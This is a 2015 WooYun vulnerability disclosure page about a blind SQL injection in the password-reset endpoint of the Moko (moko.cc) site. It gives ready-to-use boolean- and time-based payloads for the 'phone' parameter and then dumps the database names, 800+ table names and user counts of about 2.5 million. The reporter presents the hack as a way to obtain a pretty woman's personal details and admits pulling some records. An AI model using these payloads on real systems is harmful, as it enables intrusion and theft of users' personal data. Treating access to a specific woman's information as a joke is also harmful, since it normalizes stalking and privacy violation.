当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135224

漏洞标题:Moko!美空主站SQL注射近三百万用户信息

相关厂商:Moko!美空

漏洞作者: 路人甲

提交时间:2015-08-19 10:16

修复时间:2015-08-24 10:18

公开时间:2015-08-24 10:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-19: 细节已通知厂商并且等待厂商处理中
2015-08-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

数据好敏感,七夕了,领妹子回家,有福利图!

详细说明:

话说,这个妹子好漂亮,下来就说怎么搞到妹子信息的。

img2_src_10549265.jpg


来到重置密码的页面。
http://www.moko.cc/forgetPassword%7CupdatePhonePwd.action
phone参数,直接盲注,不啰嗦

漏洞证明:

Parameter: phone (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: ForgetPassword_phone=ForgetPassword_phone&get_phone_code=%e8%8e%b7%e5%8f%96%e9%aa%8c%e8%af%81%e7%a0%81&j_image_code_response=94102&passwordConfirm=wy123456&phone=123' RLIKE (SELECT (CASE WHEN (4973=4973) THEN 123 ELSE 0x28 END)) AND 'wIpU'='wIpU&user_password=chsmqxth&valideCode=94102
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: ForgetPassword_phone=ForgetPassword_phone&get_phone_code=%e8%8e%b7%e5%8f%96%e9%aa%8c%e8%af%81%e7%a0%81&j_image_code_response=94102&passwordConfirm=wy123456&phone=123' AND (SELECT * FROM (SELECT(SLEEP(5)))hUHY) AND 'aBjY'='aBjY&user_password=chsmqxth&valideCode=94102
---
back-end DBMS: MySQL 5.0.12
current user:    'jht2010@192.168.%'
available databases [8]:
[*] information_schema
[*] mokobook
[*] mokodb
[*] mysql
[*] openfire
[*] performance_schema
[*] pushservice
[*] wxmoko
Database: mokodb
[817 tables]
+-------------------------------------+
| T_RSS_AUTH                          |
| T_RSS_VENDOR_AUTHORITY              |
| T_RSS_VISIT                         |
| T_RSS_VISIT_TOP                     |
| user                                |
| admin_function                      |
| admin_log                           |
| admin_pay                           |
| admin_user                          |
| admin_user_function                 |
| aliwap_order                        |
| aliwap_order_detail                 |
| aliwap_pay                          |
| aliwap_pay_log                      |
| allmessage                          |
| app_homepageadvert                  |
| app_product_info                    |
| app_user                            |
| app_users_statis                    |
| app_users_type                      |
| appgallery                          |
| appgallery_item                     |
| apply_card                          |
| apply_card_item                     |
| apply_mp                            |
| apply_mp_item                       |
| apply_mp_tixing                     |
| apply_vip                           |
| article                             |
| article_banner                      |
| article_show                        |
| blacklist                           |
| blog_ref                            |
| blog_topic                          |
| blog_user                           |
| blog_user_count                     |
| blog_user_hot                       |
| blog_zhuanfa                        |
| cj_banner                           |
| cj_company                          |
| cj_user                             |
| cj_work_appoint                     |
| comment                             |
| company                             |
| content_count_message               |
| content_count_message_history       |
| dic_area                            |
| dic_daxue                           |
| dic_zhuanye                         |
| dingdan_cooperate                   |
| dingdan_topic                       |
| disanfang_qq_token                  |
| disanfang_qq_tongbu                 |
| disanfang_sina_token                |
| disanfang_sina_tongbu               |
| disanfang_wechat_token              |
| dw_auth_config                      |
| dw_blacklist                        |
| dw_box                              |
| dw_box_apply                        |
| dw_broadcast_movement               |
| dw_category                         |
| dw_charge_log                       |
| dw_charge_type                      |
| dw_city                             |
| dw_complain                         |
| dw_complain_type                    |
| dw_constellation                    |
| dw_employee_list                    |
| dw_employee_role_list               |
| dw_fans_exps                        |
| dw_fans_exps_level                  |
| dw_fans_info                        |
| dw_fans_info_temp                   |
| dw_fanstogirl_month                 |
| dw_feedback                         |
| dw_function_list                    |
| dw_function_role_list               |
| dw_funding                          |
| dw_funding_config                   |
| dw_funding_config_reward            |
| dw_funding_log                      |
| dw_funding_movement                 |
| dw_gift                             |
| dw_gift_exchange_log                |
| dw_gift_type                        |
| dw_girl_apply                       |
| dw_girl_daily_tasks                 |
| dw_girl_error                       |
| dw_girl_exps                        |
| dw_girl_exps_level                  |
| dw_girl_exps_week                   |
| dw_girl_info                        |
| dw_girl_shows                       |
| dw_girl_shows_item                  |
| dw_homepageadvert                   |
| dw_interceptor_config               |
| dw_login_log                        |
| dw_mainpage_girls                   |
| dw_message                          |
| dw_pay                              |
| dw_pay_bill                         |
| dw_pay_log                          |
| dw_pay_plan                         |
| dw_pay_report                       |
| dw_professions                      |
| dw_push                             |
| dw_push_log_all                     |
| dw_push_log_api                     |
| dw_push_log_batch                   |
| dw_push_log_single                  |
| dw_push_log_tag                     |
| dw_push_user                        |
| dw_relation                         |
| dw_reply                            |
| dw_role_list                        |
| dw_share_log                        |
| dw_statis_girl                      |
| dw_statis_girls                     |
| dw_statis_users                     |
| dw_status                           |
| dw_status_index                     |
| dw_status_item                      |
| dw_sys_award                        |
| dw_sys_award_type                   |
| dw_talk                             |
| dw_talk_detail_movement             |
| dw_talk_movement                    |
| dw_talk_status                      |
| dw_task_list                        |
| dw_task_log                         |
| dw_taskconf_log                     |
| dw_user_fanslevel                   |
| dw_user_message                     |
| dw_versions                         |
| dw_versions_type                    |
| dw_weblogpost_temp                  |
| elephoto_user                       |
| email_activate_log                  |
| email_blacklist                     |
| event_bad_comment                   |
| event_comment                       |
| experiencetype                      |
| fashionpe                           |
| forbid                              |
| fs_count                            |
| fs_description                      |
| fs_subscribe_00                     |
| fs_subscribe_01                     |
| fs_subscribe_02                     |
| fs_subscribe_03                     |
| fs_subscribe_04                     |
| fs_subscribe_05                     |
| fs_subscribe_06                     |
| fs_subscribe_07                     |
| fs_subscribe_08                     |
| fs_subscribe_09                     |
| fs_subscribe_10                     |
| fs_subscribe_11                     |
| fs_subscribe_12                     |
| fs_subscribe_13                     |
| fs_subscribe_14                     |
| fs_subscribe_15                     |
| fs_subscribe_16                     |
| fs_subscribe_17                     |
| fs_subscribe_18                     |
| fs_subscribe_19                     |
| fs_subscribe_20                     |
| fs_subscribe_21                     |
| fs_subscribe_22                     |
| fs_subscribe_23                     |
| fs_subscribe_24                     |
| fs_subscribe_25                     |
| fs_subscribe_26                     |
| fs_subscribe_27                     |
| fs_subscribe_28                     |
| fs_subscribe_29                     |
| fs_subscribe_30                     |
| fs_subscribe_31                     |
| fs_subscribe_32                     |
| fs_subscribe_33                     |
| fs_subscribe_34                     |
| fs_subscribe_35                     |
| fs_subscribe_36                     |
| fs_subscribe_37                     |
| fs_subscribe_38                     |
| fs_subscribe_39                     |
| fs_subscribe_40                     |
| fs_subscribe_41                     |
| fs_subscribe_42                     |
| fs_subscribe_43                     |
| fs_subscribe_44                     |
| fs_subscribe_45                     |
| fs_subscribe_46                     |
| fs_subscribe_47                     |
| fs_subscribe_48                     |
| fs_subscribe_49                     |
| fs_subscribe_50                     |
| fs_subscribe_51                     |
| fs_subscribe_52                     |
| fs_subscribe_53                     |
| fs_subscribe_54                     |
| fs_subscribe_55                     |
| fs_subscribe_56                     |
| fs_subscribe_57                     |
| fs_subscribe_58                     |
| fs_subscribe_59                     |
| fs_subscribe_60                     |
| fs_subscribe_61                     |
| fs_subscribe_62                     |
| fs_subscribe_63                     |
| fs_subscribe_64                     |
| fs_subscribe_65                     |
| fs_subscribe_66                     |
| fs_subscribe_67                     |
| fs_subscribe_68                     |
| fs_subscribe_69                     |
| fs_subscribe_70                     |
| fs_subscribe_71                     |
| fs_subscribe_72                     |
| fs_subscribe_73                     |
| fs_subscribe_74                     |
| fs_subscribe_75                     |
| fs_subscribe_76                     |
| fs_subscribe_77                     |
| fs_subscribe_78                     |
| fs_subscribe_79                     |
| fs_subscribe_80                     |
| fs_subscribe_81                     |
| fs_subscribe_82                     |
| fs_subscribe_83                     |
| fs_subscribe_84                     |
| fs_subscribe_85                     |
| fs_subscribe_86                     |
| fs_subscribe_87                     |
| fs_subscribe_88                     |
| fs_subscribe_89                     |
| fs_subscribe_90                     |
| fs_subscribe_91                     |
| fs_subscribe_92                     |
| fs_subscribe_93                     |
| fs_subscribe_94                     |
| fs_subscribe_95                     |
| fs_subscribe_96                     |
| fs_subscribe_97                     |
| fs_subscribe_98                     |
| fs_subscribe_99                     |
| fs_subscribe_double                 |
| fs_subscribe_group                  |
| guanggao_html                       |
| guanggao_html_pics                  |
| guanggao_oplog                      |
| guanggao_pics                       |
| gumt_item                           |
| gumt_user                           |
| gz_subscribe_00                     |
| gz_subscribe_01                     |
| gz_subscribe_02                     |
| gz_subscribe_03                     |
| gz_subscribe_04                     |
| gz_subscribe_05                     |
| gz_subscribe_06                     |
| gz_subscribe_07                     |
| gz_subscribe_08                     |
| gz_subscribe_09                     |
| gz_subscribe_10                     |
| gz_subscribe_11                     |
| gz_subscribe_12                     |
| gz_subscribe_13                     |
| gz_subscribe_14                     |
| gz_subscribe_15                     |
| gz_subscribe_16                     |
| gz_subscribe_17                     |
| gz_subscribe_18                     |
| gz_subscribe_19                     |
| gz_subscribe_20                     |
| gz_subscribe_21                     |
| gz_subscribe_22                     |
| gz_subscribe_23                     |
| gz_subscribe_24                     |
| gz_subscribe_25                     |
| gz_subscribe_26                     |
| gz_subscribe_27                     |
| gz_subscribe_28                     |
| gz_subscribe_29                     |
| gz_subscribe_30                     |
| gz_subscribe_31                     |
| gz_subscribe_32                     |
| gz_subscribe_33                     |
| gz_subscribe_34                     |
| gz_subscribe_35                     |
| gz_subscribe_36                     |
| gz_subscribe_37                     |
| gz_subscribe_38                     |
| gz_subscribe_39                     |
| gz_subscribe_40                     |
| gz_subscribe_41                     |
| gz_subscribe_42                     |
| gz_subscribe_43                     |
| gz_subscribe_44                     |
| gz_subscribe_45                     |
| gz_subscribe_46                     |
| gz_subscribe_47                     |
| gz_subscribe_48                     |
| gz_subscribe_49                     |
| gz_subscribe_50                     |
| gz_subscribe_51                     |
| gz_subscribe_52                     |
| gz_subscribe_53                     |
| gz_subscribe_54                     |
| gz_subscribe_55                     |
| gz_subscribe_56                     |
| gz_subscribe_57                     |
| gz_subscribe_58                     |
| gz_subscribe_59                     |
| gz_subscribe_60                     |
| gz_subscribe_61                     |
| gz_subscribe_62                     |
| gz_subscribe_63                     |
| gz_subscribe_64                     |
| gz_subscribe_65                     |
| gz_subscribe_66                     |
| gz_subscribe_67                     |
| gz_subscribe_68                     |
| gz_subscribe_69                     |
| gz_subscribe_70                     |
| gz_subscribe_71                     |
| gz_subscribe_72                     |
| gz_subscribe_73                     |
| gz_subscribe_74                     |
| gz_subscribe_75                     |
| gz_subscribe_76                     |
| gz_subscribe_77                     |
| gz_subscribe_78                     |
| gz_subscribe_79                     |
| gz_subscribe_80                     |
| gz_subscribe_81                     |
| gz_subscribe_82                     |
| gz_subscribe_83                     |
| gz_subscribe_84                     |
| gz_subscribe_85                     |
| gz_subscribe_86                     |
| gz_subscribe_87                     |
| gz_subscribe_88                     |
| gz_subscribe_89                     |
| gz_subscribe_90                     |
| gz_subscribe_91                     |
| gz_subscribe_92                     |
| gz_subscribe_93                     |
| gz_subscribe_94                     |
| gz_subscribe_95                     |
| gz_subscribe_96                     |
| gz_subscribe_97                     |
| gz_subscribe_98                     |
| gz_subscribe_99                     |
| ip                                  |
| iphone_count                        |
| iphone_pic                          |
| iphone_token                        |
| jinqw_item                          |
| jinqw_user                          |
| job                                 |
| job_apply                           |
| job_apply_log                       |
| job_apply_oppose                    |
| job_comment                         |
| job_cover                           |
| job_info                            |
| job_issuer_info                     |
| job_item                            |
| job_keyword                         |
| job_pay                             |
| job_pay_log                         |
| job_tail                            |
| job_tail_log                        |
| job_tail_option                     |
| jrbs_user                           |
| js_config                           |
| linshi_lastlogintime                |
| linshi_nickname                     |
| linshi_username                     |
| linshi_uservocation_quchong         |
| mb_behavior_applyJob                |
| mb_behavior_daily                   |
| mb_behavior_user                    |
| mb_behavior_weblogpost              |
| mb_push_log                         |
| mb_push_user                        |
| mb_weblogpost                       |
| meilai_vote                         |
| meilai_vote_code                    |
| meilai_vote_user                    |
| meilai_vote_user_pic                |
| message_apply_card                  |
| message_apply_mip                   |
| message_apply_mp                    |
| message_birthday                    |
| message_delconfig                   |
| message_gift                        |
| message_moko                        |
| message_post                        |
| message_receive                     |
| message_send                        |
| message_subscribe                   |
| message_summary                     |
| message_system                      |
| message_system_company              |
| message_system_level                |
| message_system_log                  |
| message_system_vocation             |
| message_user_history                |
| moko_banner                         |
| moko_event                          |
| moko_level                          |
| moko_order                          |
| moko_order_comment                  |
| moko_order_detail                   |
| moko_order_money                    |
| moko_order_pay_temp                 |
| moko_order_product                  |
| moko_search_collect_log_t           |
| moko_search_user_info_t             |
| moko_search_weblogpost_info_t       |
| moko_user_level                     |
| mokocall_info                       |
| mpe_comment                         |
| mpe_item                            |
| mpe_news                            |
| mpe_user                            |
| mpe_vote                            |
| msp_topic                           |
| msp_topic_item                      |
| mtb_cpAnalyse_info                  |
| mtb_dataAnalyse_info                |
| mtb_extendAnalyse_info              |
| mtb_hotjobs                         |
| mtb_joblabel                        |
| mtb_joblabel_user                   |
| mtb_jobstyle                        |
| mtb_jobstyle_user                   |
| mtb_message                         |
| mtb_modelcard                       |
| mtb_modelcard_log                   |
| mtb_norm                            |
| mtb_quote                           |
| mtb_quote_other                     |
| mtb_quote_pic                       |
| mtb_reserve                         |
| mtb_reserve_log                     |
| mtb_user                            |
| mtb_userinfo                        |
| mtb_works                           |
| mtb_wx_apply                        |
| mtg5_comment                        |
| mtg5_count                          |
| mtg5_item                           |
| mtg5_limit                          |
| mtg5_news                           |
| mtg5_user                           |
| mtg5_user_aoyun                     |
| mtg5_user_fusai                     |
| mtg5_user_qiche                     |
| mtg5_user_qq                        |
| mtg5_user_tuijian                   |
| mtg5_user_vote                      |
| mtg5_user_week                      |
| mtg5_user_youxi                     |
| mtg5_user_zuqiu                     |
| mtg5_video                          |
| mtg5_video_ad                       |
| mtg5_video_comment                  |
| mtg5_video_pingwei                  |
| mtg5_video_shangpin                 |
| mtg5_video_zanzhushang              |
| mtg_pic                             |
| mtg_shangjia                        |
| mtg_shangpin                        |
| mtg_shangpin_count                  |
| mtg_topic                           |
| mtg_topic_count                     |
| nbps_user                           |
| nickname_protect                    |
| notice                              |
| online                              |
| online_log                          |
| pay_ali_item                        |
| pay_consume_item                    |
| pay_gift                            |
| pay_in_out_detail                   |
| pay_item                            |
| pay_item_log                        |
| pay_log                             |
| pay_msp                             |
| pay_user                            |
| pay_user_account                    |
| pay_user_backup                     |
| pay_user_bank                       |
| pay_user_code                       |
| pay_user_out                        |
| pay_yb_item                         |
| personnel_training                  |
| personnel_training_pic              |
| phonecode_log                       |
| photoverify                         |
| pic_count                           |
| pic_server                          |
| pps2_class                          |
| pps2_pic                            |
| pps_Photographer                    |
| pps_User                            |
| pps_post                            |
| pps_post_item                       |
| pps_product_info                    |
| pps_product_info_item               |
| pps_vote                            |
| pps_vote_config                     |
| pps_vote_user                       |
| product_profoto                     |
| product_profoto_user                |
| profoto_user                        |
| project                             |
| project_enter                       |
| project_item                        |
| qgdcj_user                          |
| qrcode                              |
| qysys_user                          |
| rayli_item                          |
| rayli_user                          |
| register_log                        |
| register_user                       |
| register_user_log                   |
| safebox                             |
| saohuanguser                        |
| shangwj_item                        |
| shangwj_user                        |
| shdg_user                           |
| shoolshow_vote                      |
| shoolshow_vote_user                 |
| shorturl_key                        |
| shorturl_value                      |
| sinafootballgirl_user               |
| sinai_item                          |
| sinai_user                          |
| splitable_config                    |
| sys_config                          |
| test_apply                          |
| timeline                            |
| timeline_item                       |
| timeline_photo                      |
| timeline_reply                      |
| timeline_reply_reminder             |
| timertask_error                     |
| tongji_user_month                   |
| tongji_user_month_temp              |
| tongji_user_v                       |
| tongji_user_week                    |
| tongji_user_week_dive               |
| tongji_user_week_list               |
| tongji_user_week_lose               |
| tongji_user_week_temp               |
| tongji_user_week_temp_p             |
| tongji_user_week_temp_v             |
| tongji_userlogin                    |
| tongji_weblogpost                   |
| ub_config                           |
| ub_function                         |
| ub_user_behavior_log                |
| ub_user_behavior_log_backup         |
| user_auth_status                    |
| user_background                     |
| user_bad_complaint                  |
| user_broker                         |
| user_center_huodong                 |
| user_center_huodong_user            |
| user_center_info_search             |
| user_center_infoshouji              |
| user_center_manage                  |
| user_company                        |
| user_constant                       |
| user_cp                             |
| user_cp_index                       |
| user_face                           |
| user_function                       |
| user_gonggao                        |
| user_jianjie                        |
| user_job                            |
| user_largerlogo                     |
| user_lianluo                        |
| user_loginlog                       |
| user_loginlog_tmp                   |
| user_loginlog_tmp1                  |
| user_mokocall                       |
| user_new                            |
| user_op                             |
| user_pcard_image                    |
| user_person_image                   |
| user_phone                          |
| user_private                        |
| user_profile                        |
| user_profile_address                |
| user_profile_aihao                  |
| user_profile_broker                 |
| user_profile_huodong_caifang        |
| user_profile_huodong_other          |
| user_profile_huojiang_other         |
| user_profile_huojiang_top           |
| user_profile_joblabel               |
| user_profile_lianluo                |
| user_profile_lianluo_log            |
| user_profile_other                  |
| user_profile_work_company           |
| user_profile_work_jingli            |
| user_profile_xuexiao_daxue          |
| user_profile_xuexiao_peixun         |
| user_profile_zuopin_daibiaozuo      |
| user_profile_zuopin_other           |
| user_profile_zuopin_zhanlan         |
| user_progress                       |
| user_search_name                    |
| user_setpassword                    |
| user_setwkey                        |
| user_status                         |
| user_updatename                     |
| user_uploadlogo                     |
| user_vocation_good                  |
| user_yijuhua                        |
| user_yiren                          |
| user_yiren_apply                    |
| user_yuyue                          |
| user_zhaopin                        |
| user_zhizhao                        |
| userexperience_sort                 |
| userlogin_ip1                       |
| userlogin_ip2                       |
| userlogin_time1                     |
| userlogin_time2                     |
| userlogin_userid1                   |
| userlogin_userid2                   |
| username_history                    |
| uservocation                        |
| uservocation_b_userid               |
| uservocation_bakforadd              |
| visitortrack                        |
| vocation                            |
| vocation_hot                        |
| vocation_relation                   |
| vocation_tag                        |
| vocation_tag_contact                |
| vocation_tag_new                    |
| vocation_tag_relation               |
| vocation_tmp                        |
| weblog                              |
| weblogpost                          |
| weblogpost_class                    |
| weblogpost_collection               |
| weblogpost_collection_count         |
| weblogpost_count                    |
| weblogpost_geili_count              |
| weblogpost_geili_log                |
| weblogpost_history                  |
| weblogpost_history_det              |
| weblogpost_item_00                  |
| weblogpost_item_01                  |
| weblogpost_item_02                  |
| weblogpost_item_03                  |
| weblogpost_item_04                  |
| weblogpost_item_05                  |
| weblogpost_item_06                  |
| weblogpost_item_07                  |
| weblogpost_item_08                  |
| weblogpost_item_09                  |
| weblogpost_item_10                  |
| weblogpost_item_11                  |
| weblogpost_item_12                  |
| weblogpost_item_13                  |
| weblogpost_item_14                  |
| weblogpost_item_15                  |
| weblogpost_item_16                  |
| weblogpost_item_17                  |
| weblogpost_item_18                  |
| weblogpost_item_19                  |
| weblogpost_item_20                  |
| weblogpost_item_21                  |
| weblogpost_item_22                  |
| weblogpost_item_23                  |
| weblogpost_item_24                  |
| weblogpost_item_25                  |
| weblogpost_item_26                  |
| weblogpost_item_27                  |
| weblogpost_item_28                  |
| weblogpost_item_29                  |
| weblogpost_item_30                  |
| weblogpost_item_31                  |
| weblogpost_item_32                  |
| weblogpost_item_33                  |
| weblogpost_item_34                  |
| weblogpost_item_35                  |
| weblogpost_item_36                  |
| weblogpost_item_37                  |
| weblogpost_item_38                  |
| weblogpost_item_39                  |
| weblogpost_item_40                  |
| weblogpost_item_41                  |
| weblogpost_item_42                  |
| weblogpost_item_43                  |
| weblogpost_item_44                  |
| weblogpost_item_45                  |
| weblogpost_item_46                  |
| weblogpost_item_47                  |
| weblogpost_item_48                  |
| weblogpost_item_49                  |
| weblogpost_item_50                  |
| weblogpost_item_51                  |
| weblogpost_item_52                  |
| weblogpost_item_53                  |
| weblogpost_item_54                  |
| weblogpost_item_55                  |
| weblogpost_item_56                  |
| weblogpost_item_57                  |
| weblogpost_item_58                  |
| weblogpost_item_59                  |
| weblogpost_item_60                  |
| weblogpost_item_61                  |
| weblogpost_item_62                  |
| weblogpost_item_63                  |
| weblogpost_item_64                  |
| weblogpost_item_65                  |
| weblogpost_item_66                  |
| weblogpost_item_67                  |
| weblogpost_item_68                  |
| weblogpost_item_69                  |
| weblogpost_item_70                  |
| weblogpost_item_71                  |
| weblogpost_item_72                  |
| weblogpost_item_73                  |
| weblogpost_item_74                  |
| weblogpost_item_75                  |
| weblogpost_item_76                  |
| weblogpost_item_77                  |
| weblogpost_item_78                  |
| weblogpost_item_79                  |
| weblogpost_item_80                  |
| weblogpost_item_81                  |
| weblogpost_item_82                  |
| weblogpost_item_83                  |
| weblogpost_item_84                  |
| weblogpost_item_85                  |
| weblogpost_item_86                  |
| weblogpost_item_87                  |
| weblogpost_item_88                  |
| weblogpost_item_89                  |
| weblogpost_item_90                  |
| weblogpost_item_91                  |
| weblogpost_item_92                  |
| weblogpost_item_93                  |
| weblogpost_item_94                  |
| weblogpost_item_95                  |
| weblogpost_item_96                  |
| weblogpost_item_97                  |
| weblogpost_item_98                  |
| weblogpost_item_99                  |
| weblogpost_job                      |
| weblogpost_job_key                  |
| weblogpost_job_user                 |
| weblogpost_month                    |
| weblogpost_month_laji               |
| weblogpost_select                   |
| weblogpost_select_0                 |
| weblogpost_select_2                 |
| weblogpost_select_3                 |
| weblogpost_select_3_bak             |
| weblogpost_select_bizhi             |
| weblogpost_select_mobile            |
| weblogpost_select_msp               |
| weblogpost_select_mxk               |
| weblogpost_select_user              |
| weblogpost_style                    |
| weblogpost_title                    |
| weblogpost_tuijian_count            |
| weblogpost_user_tuijian             |
| weblogpost_user_tuijian_vote        |
| weblogpost_user_tuijian_vote_backup |
| weblogpost_user_tuijian_vote_post   |
| weblogpost_user_tuijian_vote_users  |
| weblogpost_vocation_tag             |
| weblogpost_vocation_tag_new         |
| weblogtempl                         |
| weblogtempl_item                    |
| weibo_v                             |
| weixin_auth                         |
| weixin_order                        |
| weixin_order_detail                 |
| weixin_pay                          |
| weixin_pay_log                      |
| wkey_protect                        |
| wx_logs                             |
| wx_menu                             |
| wx_message                          |
| wx_messageitem                      |
| wx_messagetopic                     |
| wx_post                             |
| wx_postitem                         |
| wx_posttype                         |
| yiwen_item                          |
| yiwen_user                          |
| zhangwei_user                       |
| zhitongche                          |
| zm_choice                           |
| zm_item                             |
| zm_option                           |
| zm_post                             |
| zm_topic                            |
| zm_user                             |
| zm_user_info                        |
| zm_user_item                        |
| zm_vote                             |
| zm_vote_log                         |
+-------------------------------------+
怎么这么多表。
back-end DBMS: MySQL 5.0.12
Database: mokodb
+--------+---------+
| Table  | Entries |
+--------+---------+
| `user` | 2564898 |
+--------+---------+
Database: mokodb
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| blog_user | 1285711 |     
+-----------+---------+
back-end DBMS: MySQL 5.0.12
Database: mokodb
+------------+---------+
| Table      | Entries |
+------------+---------+
| user_phone | 69407   |    问题来了,妹子信息在哪里? /坏笑
+------------+---------+

修复方案:

测试的时候就dump了几条数据,已删除,你们可以查日志。
快修复吧,!!!!!!!!!!!!!!
看到你们以前的漏洞下面有评论说,裤子都被扒了。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-24 10:18

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2015-08-19 10:18 | Manning ( 普通白帽子 | Rank:559 漏洞数:78 | 就恨自己服务器太少)

    我不信!!!

  2. 2015-08-19 10:20 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    @Manning 我信了!!!

  3. 2015-08-19 10:30 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    这个真得信

  4. 2015-08-19 10:44 | Manning ( 普通白帽子 | Rank:559 漏洞数:78 | 就恨自己服务器太少)

    @紫霞仙子 @疯狗 搞个sql注入,就能看套图?有这好事?

  5. 2015-08-19 10:59 | wy007 ( 实习白帽子 | Rank:95 漏洞数:10 | 其实我是一名卧底...)

    福利贴啊楼主威武!